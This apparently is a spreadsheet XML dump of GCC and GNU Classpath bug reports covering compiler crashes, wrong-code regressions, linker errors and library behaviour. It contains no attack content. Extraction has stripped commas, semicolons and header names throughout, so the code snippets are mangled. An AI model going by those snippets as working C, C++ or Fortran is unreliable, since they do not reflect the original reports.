Stats: 0M malloced (0M for red zones) by 1 calls
Stats: 0M realloced by 0 calls
Stats: 0M freed by 0 calls
Stats: 0M really freed by 0 calls
Stats: 4M (4M-0M) mmaped 1 maps 0 unmaps
  mmaps   by size class: 10:4095 
  mallocs by size class: 10:1 
  frees   by size class: 
  rfrees  by size class: 
Stats: malloc large: 0 small slow: 1
Stats: StackDepot: 0 ids 0M mapped
==47472== ABORTING
 should match ERROR: AddressSanitizer:? heap-use-after-free on address.*(
|
)    #37 0x[0-9a-f]+ (in [^
]*DeepFree[^
]*36|[(]).*(
|
)    #99 0x[0-9a-f]+ (in [^
]*DeepFree[^
]*98|[(]).*(
|
)    #116 0x[0-9a-f]+ (in [^
]*DeepFree[^
]*115|[(])[^
]*(
|
)
at -m32 and -m64 at all optimizations tested.</t>
  </si>
  <si>
    <t>GCC-52228</t>
  </si>
  <si>
    <t>Bugzilla: Missing link for PR....</t>
  </si>
  <si>
    <t>In the following line the second PR is not linkified - only the first one:
   cf. PR49733/PR25829
   cf. PR 49733/PR 25829
I think it works with bug:
  cf. bug49733/bug25829
  cf. bug 49733/bug 25829
  cf. bug #49733/bug #25829</t>
  </si>
  <si>
    <t>LpSolit</t>
  </si>
  <si>
    <t>GCC-83791</t>
  </si>
  <si>
    <t>Move tests to libgomp.c-c++-common</t>
  </si>
  <si>
    <t>The directory libgomp/testsuite/libgomp.c-c++-common was added recently.
There are tests in libgomp/testsuite/libgomp.c that are reused in libgomp/testsuite/libgomp.c++ using an include and it makes sense to unify these two tests by moving themm to libgomp/testsuite/libgomp.c-c++-common.</t>
  </si>
  <si>
    <t>GCC-53416</t>
  </si>
  <si>
    <t>Wrong code when optimising loop involving _rdrand32_step</t>
  </si>
  <si>
    <t>Created attachment 27440
Reduced test case
The attached file prints different output depending whether it is compiled with -O0 -O1 or -O2 on gcc-Version 4.7.0 20120507 (Red Hat 4.7.0-5) (GCC).
When the file is built with gcc -std=c99 -mrdrnd -O0 rngtest.i it prints four different random numbers. If it is built with gcc -std=c99 -mrdrnd -O1 rngtest.i it prints the same number four times. If it is built with gcc -std=c99 -mrdrnd -O2 rngtest.i it prints the random number four times and prints the random number as the result of the call to _rdrand32_step. The last one is especially surprising because _rdrand32_step should only return 0 or 1.</t>
  </si>
  <si>
    <t>marcel.kyas</t>
  </si>
  <si>
    <t>GCC-29990</t>
  </si>
  <si>
    <t>Linking fails because __ZdlPv can't be a weak definition</t>
  </si>
  <si>
    <t>Configured with: ../gcc-4.1.1/configure --prefix=/opt/local --enable-languages=cc++javaobjcobj-c++fortran --libdir=/opt/local/lib/gcc41 --includedir=/opt/local/include/gcc41 --infodir=/opt/local/share/info --mandir=/opt/local/share/man --with-local-prefix=/opt/local --with-system-zlib --disable-nls --program-suffix=-dp-4.1 --with-gxx-include-dir=/opt/local/include/gcc41/c++/ --with-gmp=/opt/local --with-mpfr=/opt/local --with-as=/opt/local/bin/odas --with-ld=/opt/local/bin/odld --with-ar=/opt/local/bin/odar --disable-multilib
Triggered by :
g++-dp-4.1 -Wl-noall_load -read_only_relocs warning -fgnu-runtime -single_module  -dynamic -dynamiclib  -current_version 0.0.1 -install_name PopplerKit.framework/PopplerKit  -L/opt/local/GNUstep/System/Library/Libraries/poppler/lib -lpoppler  -L/opt/local/GNUstep/System/Library/Libraries/poppler/lib -lpoppler -L/opt/local/lib/gcc41 -lstdc++      -flat_namespace -undefined warning -o PopplerKit.framework/Versions/1.0/./libPopplerKit.dylib.0.0.1  shared_obj/NSFramework_PopplerKit.o shared_obj/CountingRef.o shared_obj/NSBitmapImageRep+LRUCache.o shared_obj/NSString+PopplerKitAdditions.o shared_obj/PopplerCairoImageRenderer.o shared_obj/PopplerDirectBufferedRenderer.o shared_obj/PopplerDocument.o shared_obj/PopplerDocument+Rendering.o shared_obj/PopplerFontManager.o shared_obj/PopplerPage.o shared_obj/PopplerTextHit.o shared_obj/PopplerTextSearch.o shared_obj/PopplerSplashRenderer.o shared_obj/PopplerCachingRenderer.o shared_obj/PopplerKitFunctions.o bindings/shared_obj/subproject.o MissingKit/shared_obj/subproject.o  -L/Users/Shared/dports/build/_Users_Shared_src_darwinports_dev_gnustep_etoile-dev/work/etoile/Etoile/Build -L/opt/local/GNUstep/Local/Library/Libraries/ -L/opt/local/GNUstep/System/Library/Libraries/    (cd ./PopplerKit.framework/Versions/1.0/. rm -f libPopplerKit.dylib if [ libPopplerKit.dylib.0 != libPopplerKit.dylib.0.0.1 ] then rm -f libPopplerKit.dylib.0 ln -s libPopplerKit.dylib.0.0.1 libPopplerKit.dylib.0 fi ln -s libPopplerKit.dylib.0.0.1 libPopplerKit.dylib) || rm -f ./PopplerKit.framework/Versions/1.0/./libPopplerKit.dylib.0.0.1  \
(cd ./PopplerKit.framework/Versions/1.0/. \
  rm -f PopplerKit \
  ln -s libPopplerKit.dylib PopplerKit) \
/opt/local/bin/odld: bindings/shared_obj/subproject.o undefined symbol 744 (__ZdlPv) can't be a weak definition
/opt/local/bin/odlibtool: internal link edit command failed
I think this is a bug because this problem only happens when crossing Darwin/objc and __ZdlPv is a libstdc++ internal
I'm not really sure which .i to include though</t>
  </si>
  <si>
    <t>GCC-22141</t>
  </si>
  <si>
    <t>[5/6/7 Regression] Missing optimization when storing structures</t>
  </si>
  <si>
    <t>In the attached example the store of type_t is not optimized by gcc. Instead 
of storing one 32-bit value four 8-bit values are stored. 
gcc-4.0.1 produces the following code: 
 /home/fm3/foo.c:16 
 80483b7:       c6 05 13 96 04 08 04    movb   $0x40x8049613 
 80483be:       c6 05 12 96 04 08 03    movb   $0x30x8049612 
 80483c5:       c6 05 11 96 04 08 02    movb   $0x20x8049611 
 80483cc:       c6 05 10 96 04 08 01    movb   $0x10x8049610 
gcc-3.4.5 produces the following code: 
 /home/fm3/foo.c:16 
 8048391:       ba 01 02 03 04          mov    $0x4030201%edx 
 /home/fm3/foo.c:15 
 8048396:       89 e5                   mov    %esp%ebp 
 8048398:       83 ec 18                sub    $0x18%esp 
 804839b:       83 e4 f0                and    $0xfffffff0%esp 
 804839e:       83 ec 10                sub    $0x10%esp 
 /home/fm3/foo.c:16 
 80483a1:       89 15 1c 96 04 08       mov    %edx0x804961c 
  (better) 
gcc-2.95.4 produces the following code: 
 /home/fm3/foo.c:16 
 80483f7:       c7 05 84 96 04 08 01    movl   $0x40302010x8049684 
 80483fe:       02 03 04 
 (best because no register allocation) 
The example: 
#include  
typedef struct 
{ 
  unsigned char a 
  unsigned char b 
  unsigned char c 
  unsigned char d 
} type_t 
static type_t u 
int 
main(void) 
{ 
  u = (type_t){ 1 2 3 4} 
  printf(%d %d %d %d\n u.a u.b u.c u.d) 
  return 0 
} 
gcc-4.0 -v -save-temps -g -o foo -W -Wall -Wformat=2 -O3 -Wall -W 
-fomit-frame-pointer -march=pentium3 -g foo.c: 
Using built-in specs. 
Target: i486-linux 
Configured with: ../src/configure -v 
--enable-languages=cc++javaf95objcadatreelang --prefix=/usr 
--enable-shared --with-system-zlib --libexecdir=/usr/lib --enable-nls 
--without-included-gettext --enable-threads=posix --program-suffix=-4.0 
--enable-__cxa_atexit --enable-libstdcxx-allocator=mt --enable-clocale=gnu 
--enable-libstdcxx-debug --enable-java-gc=boehm --enable-java-awt=gtk 
--enable-mpfr --disable-werror --enable-checking=release i486-linux 
Thread model: posix 
gcc version 4.0.1 20050522 (prerelease) (Debian 4.0.0-9) 
 /usr/lib/gcc/i486-linux/4.0.1/cc1 -E -quiet -v foo.c -march=pentium3 -W -Wall 
-Wformat=2 -Wall -W -fomit-frame-pointer -fworking-directory -O3 
-fpch-preprocess -o foo.i 
ignoring nonexistent directory 
/usr/lib/gcc/i486-linux/4.0.1/../../../../i486-linux/include 
#include ... search starts here: 
#include  search starts here: 
 /usr/local/include 
 /usr/lib/gcc/i486-linux/4.0.1/include 
 /usr/include 
End of search list. 
 /usr/lib/gcc/i486-linux/4.0.1/cc1 -fpreprocessed foo.i -quiet -dumpbase foo.c 
-march=pentium3 -auxbase foo -g -g -O3 -W -Wall -Wformat=2 -Wall -W -version 
-fomit-frame-pointer -o foo.s 
GNU C version 4.0.1 20050522 (prerelease) (Debian 4.0.0-9) (i486-linux) 
        compiled by GNU C version 4.0.1 20050522 (prerelease) (Debian 
4.0.0-9). 
GGC heuristics: --param ggc-min-expand=64 --param ggc-min-heapsize=64260 
 as -V -Qy --32 -o foo.o foo.s 
GNU assembler version 2.15 (i486-linux-gnu) using BFD version 2.15 
 /usr/lib/gcc/i486-linux/4.0.1/collect2 --eh-frame-hdr -m elf_i386 
-dynamic-linker /lib/ld-linux.so.2 -o 
foo /usr/lib/gcc/i486-linux/4.0.1/../../../../lib/crt1.o /usr/lib/gcc/i486-linux/4.0.1/../../../../lib/crti.o /usr/lib/gcc/i486-linux/4.0.1/crtbegin.o 
-L/usr/lib/gcc/i486-linux/4.0.1 -L/usr/lib/gcc/i486-linux/4.0.1 
-L/usr/lib/gcc/i486-linux/4.0.1/../../../../lib 
-L/usr/lib/gcc/i486-linux/4.0.1/../../.. -L/lib/../lib -L/usr/lib/../lib foo.o 
-lgcc --as-needed -lgcc_s --no-as-needed -lc -lgcc --as-needed -lgcc_s 
--no-as-needed /usr/lib/gcc/i486-linux/4.0.1/crtend.o /usr/lib/gcc/i486-linux/4.0.1/../../../../lib/crtn.o</t>
  </si>
  <si>
    <t>frank.mehnert</t>
  </si>
  <si>
    <t>GCC-50793</t>
  </si>
  <si>
    <t>G++ doesn't value-initialize all members of non-trivial type in default argument</t>
  </si>
  <si>
    <t>struct NonTrivial
{
    NonTrivial() { }
}
struct S
{
    NonTrivial nt
    int i
}
int f(S s = S())
{
    s.i = 0xdeadbeef
    return s.i
}
int g(S s = S())
{
    return s.i
}
int main()
{
    f()  // make stack dirty
    if ( g() )
        __builtin_abort()
}
This should not abort the default argument of g() should be value-initialized which means:
C++03) if T is a non-union class type without a user-declared constructor then every non-static data member and base-class component of T is value-initialized
C++11) if T is a (possibly cv-qualified) non-union class type without a user-provided constructor then the object is zero-initialized and if Tâ€™s implicitly-declared default constructor is non-trivial that constructor is
called.
If the implicitly-declared constructor S::S() is trivial then S::i is zero-initialized as expected.  When S::S() is non-trivial NonTrivial::NonTrivial() is called correctly but S::i is not zero-initialized.
N.B. the test does not fail if the default argument uses list-init S{}
This was identified by my -Wmeminit patch for PR 2972 which identified  uninitialized data when doing:
  std::vector v
  v.resize(1)</t>
  </si>
  <si>
    <t>GCC-52174</t>
  </si>
  <si>
    <t>[DR 1423] Implicit conversion of nullptr to bool</t>
  </si>
  <si>
    <t>Document 'A name for the null pointer: nullptr (revision 4)' states that implicit conversion of nullptr to bool is not allowed. Unfortunately in g++ 4.7.0 this requirement is not fulfilled. See example below.
if (nullptr) //shall return error implicit conversion to bool not allowed</t>
  </si>
  <si>
    <t>lsoltysiak</t>
  </si>
  <si>
    <t>GCC-60427</t>
  </si>
  <si>
    <t>[4.9 Regression] r208312 causes ICE and wrong code for Fortran with -flto</t>
  </si>
  <si>
    <t>After r208312 (+ the fix in r208315) I get
FAIL: gfortran.dg/pr33794.f90  -g -flto  execution test
with both -m32/-m64 and
FAIL: gfortran.dg/nint_2.f90  -g -flto  (internal compiler error)
with -m64 (r208311 + the fix in r208315 is OK).
The ICE occurs for the following reduced test
  real(kind=8) :: a
  integer(kind=8) :: i1
!  a = nearest(0.5_8-1.0_8)
!  i1 = nint(a)
  a = 0.5_8
  i1 = nint(a)
!  a = nearest(0.5_81.0_8)
!  i1 = nint(a)
  end
[Book15] f90/bug% /opt/gcc/gcc4.9p-208312/bin/gfortran -flto nint_2_red.f90
nint_2_red.f90: In function 'MAIN__':
nint_2_red.f90:8:0: internal compiler error: Segmentation fault: 11
   i1 = nint(a)
The wong code is produced with '-O1 -ffast-math -flto' for gfortran.dg/pr33794.f90 as well as the polyhedron test fatigue.f90.</t>
  </si>
  <si>
    <t>pmatos</t>
  </si>
  <si>
    <t>GCC-6224</t>
  </si>
  <si>
    <t>[fr30] 'Unrecognizable insn' message</t>
  </si>
  <si>
    <t>test.c: In function `strcat':
test.c:12: Unrecognizable insn:
(jump_insn 89 86 107 (set (pc)
        (label_ref 106)) -1 (insn_list 88 (insn_list 88 (nil)))
    (expr_list:REG_DEAD (reg:CC 16 cc)
        (expr_list:REG_BR_PROB (const_int 3999 [0xf9f])
            (nil))))
test.c:12: Internal compiler error in num_delay_slots at insn-attrtab.c:265
Release:
3.0.4
Environment:
Linux x86 and Mingw32
How-To-Repeat:
fr30-none-elf-gcc -O2 -g -c test.c</t>
  </si>
  <si>
    <t>pazke</t>
  </si>
  <si>
    <t>GCC-14012</t>
  </si>
  <si>
    <t>HttpURLConnection.setRequestProperty() is not case insensitive</t>
  </si>
  <si>
    <t>With Sun Javam the setRequestProperty() function is case insensitive.
For example on a default connection to http://apache.org/ the following request
header is sent by Sun java by default:
  GET / HTTP/1.1
  User-Agent: Java/1.4.1
  Host: apache.org
  Accept: text/html image/gif image/jpeg * q=.2 */* q=.2
  Connection: keep-alive
And if you change the request by adding the following before getting the inpput
stream:
  conn.setRequestProperty(UsEr-AgEnT MyAgent/1.0)
Then the request is changed thusly:
  GET / HTTP/1.1
  UsEr-AgEnT: MyAgent/1.0
  Host: apache.org
  Accept: text/html image/gif image/jpeg * q=.2 */* q=.2
  Connection: keep-alive
However with GCJ the following headers are sent with the same request as above:
  GET / HTTP/1.1
  UsEr-AgEnT: MyAgent/1.0
  Content-type: application/x-www-form-urlencoded
  accept: */*
  Host: apache.org
  user-agent: gnu-libgcj/3.5.0 20040202 (experimental)
  Connection: Close
Now firstly the lowercase format of the default headers defies convention
anyone who is writing a client will be expecting the user-agent field to be
specified as User-Agent.
Secondly the User-Agent field is sent twice once in the mixed-case and then
the default one is sent in lower case afterwards.
Thirdly a Content-type: application/x-www-form-urlencoded header line is
added for no particular reason.
Further investigation reveals that the Sun engine given the following set of
commands:
  conn.setRequestProperty(X-AgEnT Test 1)
  conn.setRequestProperty(x-aGeNt Test 2)
Ends up sending out a header line of:
  X-AgEnT: Test 2
Which has the key in the capitalization of the first line but the value is that
of the second line.
With the attached patch GCJ will exhibit a more Sun java behaviour with respect
to setting/sending request properties.
The differences that exist between the GCJ and Sun implementations after this
patch are:
1) The Host line is sent before User-Agent line. This is consistent with the
behaviour of Mozilla (as a matter of fact with this patch all the standard
headers are output in Mozilla-like order)
2) The default Accept line has been changed to a more flexible:
    text/xmltext/htmlq=0.9
     text/plainq=0.8
     video/x-mngimage/pngimage/jpegimage/gifq=0.2
     */*q=0.1
Maybe this last change is not suitable for everyone and the Sun version of the
Accept line would be more preferred for the masses but Sun didn't contain XML
or PNG and that's what I'm using so that's what I put in. It's at least a
million times better than */* anyhow.</t>
  </si>
  <si>
    <t>konqueror</t>
  </si>
  <si>
    <t>k.allan-gcc</t>
  </si>
  <si>
    <t>GCC-24477</t>
  </si>
  <si>
    <t>[4.1 Regression] g++.old-deja/g++.abi/vtable2.C (test for excess errors) fails</t>
  </si>
  <si>
    <t>FAIL: g++.old-deja/g++.abi/vtable2.C (test for excess errors)
has appeared on mainline on hppa2.0w-hp-hpux11.11 on 20051021.
/scratch/gcc/nightly-2005-10-21-mainline/src/gcc-mainline/gcc/testsuite/g++.old-deja/g++.abi/vtable2.C:127: error: alias definitions not supported in this configuration
/scratch/gcc/nightly-2005-10-21-mainline/src/gcc-mainline/gcc/testsuite/g++.old-deja/g++.abi/vtable2.C:128: error: alias definitions not supported in this configuration
See also .</t>
  </si>
  <si>
    <t>GCC-68392</t>
  </si>
  <si>
    <t>ICE: SIGSEGV in update_uses (fwprop.c:896) with -fno-checking</t>
  </si>
  <si>
    <t>Created attachment 36743
reduced testcase
Compiler output:
$ aarch64-unknown-linux-gnu-gcc -O -fno-checking testcase.c -wrapper valgrind-q--num-callers=40
==16356== Invalid read of size 8
==16356==    at 0x111163A: sparseset_bit_p (sparseset.h:143)
==16356==    by 0x111163A: update_uses (fwprop.c:896)
==16356==    by 0x111163A: update_df(rtx_insn* rtx_def*) (fwprop.c:919)
==16356==    by 0x11127FC: try_fwprop_subst(df_ref_d* rtx_def** rtx_def* rtx_insn* bool) (fwprop.c:1007)
==16356==    by 0x1112F2A: forward_propagate_and_simplify (fwprop.c:1321)
==16356==    by 0x1112F2A: forward_propagate_into(df_ref_d*) (fwprop.c:1374)
==16356==    by 0x1113C24: fwprop (fwprop.c:1457)
==16356==    by 0x1113C24: (anonymous namespace)::pass_rtl_fwprop::execute(function*) (fwprop.c:1490)
==16356==    by 0xA29FF7: execute_one_pass(opt_pass*) (passes.c:2325)
==16356==    by 0xA2A597: execute_pass_list_1(opt_pass*) (passes.c:2398)
==16356==    by 0xA2A5A9: execute_pass_list_1(opt_pass*) (passes.c:2399)
==16356==    by 0xA2A5F4: execute_pass_list(function* opt_pass*) (passes.c:2409)
==16356==    by 0x703593: cgraph_node::expand() (cgraphunit.c:1965)
==16356==    by 0x704E95: expand_all_functions (cgraphunit.c:2101)
==16356==    by 0x704E95: symbol_table::compile() (cgraphunit.c:2450)
==16356==    by 0x706D85: symbol_table::finalize_compilation_unit() (cgraphunit.c:2540)
==16356==    by 0xB2A1D3: compile_file() (toplev.c:489)
==16356==    by 0x56C7BD: do_compile (toplev.c:1951)
==16356==    by 0x56C7BD: toplev::main(int char**) (toplev.c:2058)
==16356==    by 0x56E576: main (main.c:39)
==16356==  Address 0x18 is not stack'd malloc'd or (recently) free'd
==16356== 
testcase.c: In function 'foo':
testcase.c:8:1: internal compiler error: Segmentation fault
 }
 ^
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
$ aarch64-unknown-linux-gnu-gcc -v
Using built-in specs.
COLLECT_GCC=/mnt/svn/gcc-trunk/binary-latest-aarch64/bin/aarch64-unknown-linux-gnu-gcc
COLLECT_LTO_WRAPPER=/mnt/svn/gcc-trunk/binary-230409-checking-release-nographite-aarch64/libexec/gcc/aarch64-unknown-linux-gnu/6.0.0/lto-wrapper
Target: aarch64-unknown-linux-gnu
Configured with: /mnt/svn/gcc-trunk//configure --enable-checking=release --enable-languages=cc++ --prefix=/mnt/svn/gcc-trunk/binary-230409-checking-release-nographite-aarch64/ --without-cloog --without-ppl --without-isl --host=x86_64-pc-linux-gnu --target=aarch64-unknown-linux-gnu --build=x86_64-pc-linux-gnu --with-sysroot=/home/aarch64-chroot --with-as=/usr/libexec/gcc/aarch64-unknown-linux-gnu/as --with-ld=/usr/libexec/gcc/aarch64-unknown-linux-gnu/ld
Thread model: posix
gcc version 6.0.0 20151116 (experimental) (GCC) 
I don't have any other recent GCC by hand than this aarch64 crosscompiler configured with --enable-checking=yesrtldf
Tested revisions:
r230409 - ICE</t>
  </si>
  <si>
    <t>GCC-28109</t>
  </si>
  <si>
    <t>[4.0/4.1/4.2 regression] ICE with typeid of incomplete type</t>
  </si>
  <si>
    <t>The following invalid code snippet causes an ICE since GCC 3.4.0:
=================================
#include 
struct A
void foo()
{
  A a
  typeid (a)
}
=================================
bug.cc: In function 'void foo()':
bug.cc:7: error: aggregate 'A a' has incomplete type and cannot be defined
bug.cc:8: internal compiler error: tree check: expected class 'type' have 'exceptional' (error_mark) in get_tinfo_decl_dynamic at cp/rtti.c:238
Please submit a full bug report [etc.]
Testing a patch.</t>
  </si>
  <si>
    <t>CLASSPATH-27455</t>
  </si>
  <si>
    <t>Problem with MouseListener on JFrame</t>
  </si>
  <si>
    <t>Adding a MouseListener directly to a JFrame (and not to its content pane) doesn't seem to work. The listener methods are not called.
See attached testcase.
Tested with cacao and jamvm.
Behavior with Sun JVM : mousePressed() is called.
Classpath version : HEAD from 05-06-2006.</t>
  </si>
  <si>
    <t>GCC-77809</t>
  </si>
  <si>
    <t>[7 regression] _LITTLE_ENDIAN redefined</t>
  </si>
  <si>
    <t>Bootstrap (--enable-languages=allobj-c++go) fails in libgo:
/home/glisse/test/pristine/build/./gcc/xgcc -B/home/glisse/test/pristine/build/./gcc/ -B/home/glisse/test/pristine/inst/powerpc64le-unknown-linux-gnu/bin/ -B/home/glisse/test/pristine/inst/powerpc64le-unknown-linux-gnu/lib/ -isystem /home/glisse/test/pristine/inst/powerpc64le-unknown-linux-gnu/include -isystem /home/glisse/test/pristine/inst/powerpc64le-unknown-linux-gnu/sys-include    -DHAVE_CONFIG_H -I. -I/home/glisse/pristine/libgo  -I /home/glisse/pristine/libgo/runtime -I/home/glisse/pristine/libgo/../libffi/include -I../libffi/include -pthread  -fexceptions -fnon-call-exceptions -fplan9-extensions -fsplit-stack -Wall -Wextra -Wwrite-strings -Wcast-qual -Werror  -D_GNU_SOURCE -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64 -I /home/glisse/pristine/libgo/../libgcc -I /home/glisse/pristine/libgo/../libbacktrace -I ../../gcc/include -fPIC -g -O2 -MT libgobegin_a-go-main.o -MD -MP -MF .deps/libgobegin_a-go-main.Tpo -c -o libgobegin_a-go-main.o `test -f 'runtime/go-main.c' || echo '/home/glisse/pristine/libgo/'`runtime/go-main.c
In file included from /home/glisse/pristine/libgo/runtime/runtime.h:116:0
                 from /home/glisse/pristine/libgo/runtime/go-main.c:17:
./runtime.inc:2650:0: error: _LITTLE_ENDIAN redefined [-Werror]
 #define _LITTLE_ENDIAN 1234
: note: this is the location of the previous definition
cc1: all warnings being treated as errors</t>
  </si>
  <si>
    <t>GCC-62005</t>
  </si>
  <si>
    <t>[4.10 regression] with --enable-checking=rtl : loop-unroll.c:2095:10: error: function may return address of local variable</t>
  </si>
  <si>
    <t>r213523 r213529 FAIL
r213316 PASS
~/src/gcc_r213529/configure --enable-checking=rtl
make
[...]
make[3]: Entering directory `/home/dimhen/build/gcc_r213529_rtl/gcc'
/home/dimhen/build/gcc_r213529_rtl/./prev-gcc/xg++ -B/home/dimhen/build/gcc_r213529_rtl/./prev-gcc/ -B/usr/local/x86_64-unknown-linux-gnu/bin/ -nostdinc++ -B/home/dimhen/build/gcc_r213529_rtl/prev-x86_64-unknown-linux-gnu/libstdc++-v3/src/.libs -B/home/dimhen/build/gcc_r213529_rtl/prev-x86_64-unknown-linux-gnu/libstdc++-v3/libsupc++/.libs  -I/home/dimhen/build/gcc_r213529_rtl/prev-x86_64-unknown-linux-gnu/libstdc++-v3/include/x86_64-unknown-linux-gnu  -I/home/dimhen/build/gcc_r213529_rtl/prev-x86_64-unknown-linux-gnu/libstdc++-v3/include  -I/home/dimhen/src/gcc_r213529/libstdc++-v3/libsupc++ -L/home/dimhen/build/gcc_r213529_rtl/prev-x86_64-unknown-linux-gnu/libstdc++-v3/src/.libs -L/home/dimhen/build/gcc_r213529_rtl/prev-x86_64-unknown-linux-gnu/libstdc++-v3/libsupc++/.libs -c   -g -O2 -gtoggle -DIN_GCC    -fno-exceptions -fno-rtti -fasynchronous-unwind-tables -W -Wall -Wno-narrowing -Wwrite-strings -Wcast-qual -Wmissing-format-attribute -Woverloaded-virtual -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings -Werror   -DHAVE_CONFIG_H -I. -I. -I/home/dimhen/src/gcc_r213529/gcc -I/home/dimhen/src/gcc_r213529/gcc/. -I/home/dimhen/src/gcc_r213529/gcc/../include -I/home/dimhen/src/gcc_r213529/gcc/../libcpp/include -I/home/dimhen/build/gcc_r213529_rtl/./gmp -I/home/dimhen/src/gcc_r213529/gmp -I/home/dimhen/build/gcc_r213529_rtl/./mpfr -I/home/dimhen/src/gcc_r213529/mpfr -I/home/dimhen/src/gcc_r213529/mpc/src  -I/home/dimhen/src/gcc_r213529/gcc/../libdecnumber -I/home/dimhen/src/gcc_r213529/gcc/../libdecnumber/bid -I../libdecnumber -I/home/dimhen/src/gcc_r213529/gcc/../libbacktrace -DCLOOG_INT_GMP -I/home/dimhen/build/gcc_r213529_rtl/./cloog/include -I/home/dimhen/src/gcc_r213529/cloog/include -I/home/dimhen/build/gcc_r213529_rtl/./isl/include -I/home/dimhen/src/gcc_r213529/isl/include  -o loop-unroll.o -MT loop-unroll.o -MMD -MP -MF ./.deps/loop-unroll.TPo /home/dimhen/src/gcc_r213529/gcc/loop-unroll.c
/home/dimhen/src/gcc_r213529/gcc/loop-unroll.c: In function 'rtx_def** get_ivts_expr(rtx iv_to_split*)':
/home/dimhen/src/gcc_r213529/gcc/loop-unroll.c:2095:10: error: function may return address of local variable [-Werror=return-local-addr]
   return ret
          ^
/home/dimhen/src/gcc_r213529/gcc/loop-unroll.c:2087:20: note: declared here
 get_ivts_expr (rtx expr struct iv_to_split *ivts)
                    ^
cc1plus: all warnings being treated as errors
make[3]: *** [loop-unroll.o] Error 1
make[3]: Leaving directory `/home/dimhen/build/gcc_r213529_rtl/gcc'</t>
  </si>
  <si>
    <t>GCC-3919</t>
  </si>
  <si>
    <t>__builtin_constant_p false on long long compile-time-known variable converted to long on 32-bit platform</t>
  </si>
  <si>
    <t>__builtin_constant_p returns false when it's called on a global long long variable known to be constant (__builtin_constant_p returns true on it without typecasts) typecasted to long (probably happens for all 32-bit platforms but only tested on i386).
This bug isn't present for local variables.
This bug is present at any optimization level.
Release:
3.0
Environment:
i686-pc-cygwin CYGWIN_NT-5.0 1.3.2(0.39/3/2) i686 unknown
How-To-Repeat:
// Compile this (as either C or C++) and check the return value from the shell
// Returns: 2
// Should return: 3
long long var
int main(int argc char** argv)
{
	var = 0
	return (__builtin_constant_p(var) ? 2 : 0)
		| (__builtin_constant_p((long)var) ? 1 : 0)
}</t>
  </si>
  <si>
    <t>lkb</t>
  </si>
  <si>
    <t>GCC-60236</t>
  </si>
  <si>
    <t>gfortran.dg/vect/pr32380.f fails on ARM</t>
  </si>
  <si>
    <t>Hi
this test case fails because the only 5 of 6 loops get optimized:
pr32380.f:162:0: note: function is not vectorizable.                                                                    
pr32380.f:162:0: note: not vectorized: relevant stmt not supported: _113 = __builtin_sqrtf (_112)
pr32380.f:5:0: note: vectorized 5 loops in function.
but the test case expects 6 loops here.
gcc -v
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/home/ed/gnu/arm-linux-gnueabihf/libexec/gcc/armv7l-unknown-linux-gnueabihf/4.9.0/lto-wrapper
Target: armv7l-unknown-linux-gnueabihf
Configured with: ../gcc-4.9-20140209/configure --prefix=/home/ed/gnu/arm-linux-gnueabihf --enable-languages=cc++objcobj-c++fortranadago --with-arch=armv7-a --with-tune=cortex-a9 --with-fpu=vfpv3-d16 --with-float=hard
Thread model: posix
gcc version 4.9.0 20140209 (experimental) (GCC)</t>
  </si>
  <si>
    <t>GCC-80156</t>
  </si>
  <si>
    <t>[7 Regression] Generic DTIO interface reported missing if public statement preceeds the interface block</t>
  </si>
  <si>
    <t>Created attachment 41025
Module that fails to compile with gfortran 7.0.1 (r152875)
gfortran 7.0.1 (r152875) fails to compile the attached module that uses derived type IO. The error message is:
ftlString.F90:10:31:
    public :: write(unformatted) ! has to be after the interface block for gfortran 7 ... compiler bug?
                               1
Error: The GENERIC DTIO INTERFACE at (1) is not present in the MODULE 'stringmodule'
Moving the reported line below the definition of the interface block fixes the problem but I believe that the order should be irrelevant.</t>
  </si>
  <si>
    <t>pedsxing</t>
  </si>
  <si>
    <t>GCC-40238</t>
  </si>
  <si>
    <t>[4.5 Regression] ICE in gimple_verify_flow_info at tree-cfg.c:4603</t>
  </si>
  <si>
    <t>gcc -c -O3 ahd_bayer.i
ahd_bayer.i: In function 'xgp_ahd_interpolate':
ahd_bayer.i:3: internal compiler error: in gimple_verify_flow_info at tree-cfg.c:4603
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-18099</t>
  </si>
  <si>
    <t>Incorrect rounding from floating point to integer</t>
  </si>
  <si>
    <t>Ada requires conversion of floating-point to integer to round with halfway cases rounded away from 
zero. This is implemented by adding 0.5 to the floating-point value and then truncating as in regular C 
float to int conversion. However this gives wrong semantics for the predecessor of 0.5 and odd 
floating-point integers in the range 2.0**(mantissa - 1)+1.0 .. 2.0**(mantissa)-1.0 and the negative 
versions of these.
The reason is that adding 0.5 in the above cases yields a value exactly between two 
representable floating-point numbers. So the predecessor of 0.5 is then rounded to one and the 
floating-point integers mentioned before get rounded to the next higher integer.
I'll file a self-contained test case testing these cases.</t>
  </si>
  <si>
    <t>bosch</t>
  </si>
  <si>
    <t>GCC-21802</t>
  </si>
  <si>
    <t>Two-stage name lookup fails for operators</t>
  </si>
  <si>
    <t>The following program should compile (and does on recently EDG-base compilers)
because the operator== is build when the template is parsed (it is
non-dependent). However GCC looks up the == operator at instantiation time and
finds the second incorrect definition of operator==. This is similar to Bug
2922 but deals with operators instead of normal function names which GCC
handles (very) differently internally.
template struct wrap {}
template bool
template
void g(T wrap &gt; x)
{
  bool
}
template int
void h()
{
  wrap &gt; x
  g(17 x)
}</t>
  </si>
  <si>
    <t>doug.gregor</t>
  </si>
  <si>
    <t>GCC-79811</t>
  </si>
  <si>
    <t>ICE verify_flow_info failed with -param vect-epilogues-nomask=1 and -mavx512vbmi</t>
  </si>
  <si>
    <t>Starting from r242501 we ICE on:
$ gcc /home/marxin/Programming/gcc/gcc/testsuite/gcc.dg/pr46771.c -O3 --param vect-epilogues-nomask=1 -mavx512vbmi
/home/marxin/Programming/gcc/gcc/testsuite/gcc.dg/pr46771.c: In function â€˜fooâ€™:
/home/marxin/Programming/gcc/gcc/testsuite/gcc.dg/pr46771.c:9:1: error: control flow in the middle of basic block 9
 foo (unsigned char x)
 ^~~
/home/marxin/Programming/gcc/gcc/testsuite/gcc.dg/pr46771.c:9:1: error: control flow in the middle of basic block 9
/home/marxin/Programming/gcc/gcc/testsuite/gcc.dg/pr46771.c:9:1: error: wrong outgoing edge flags at end of bb 9
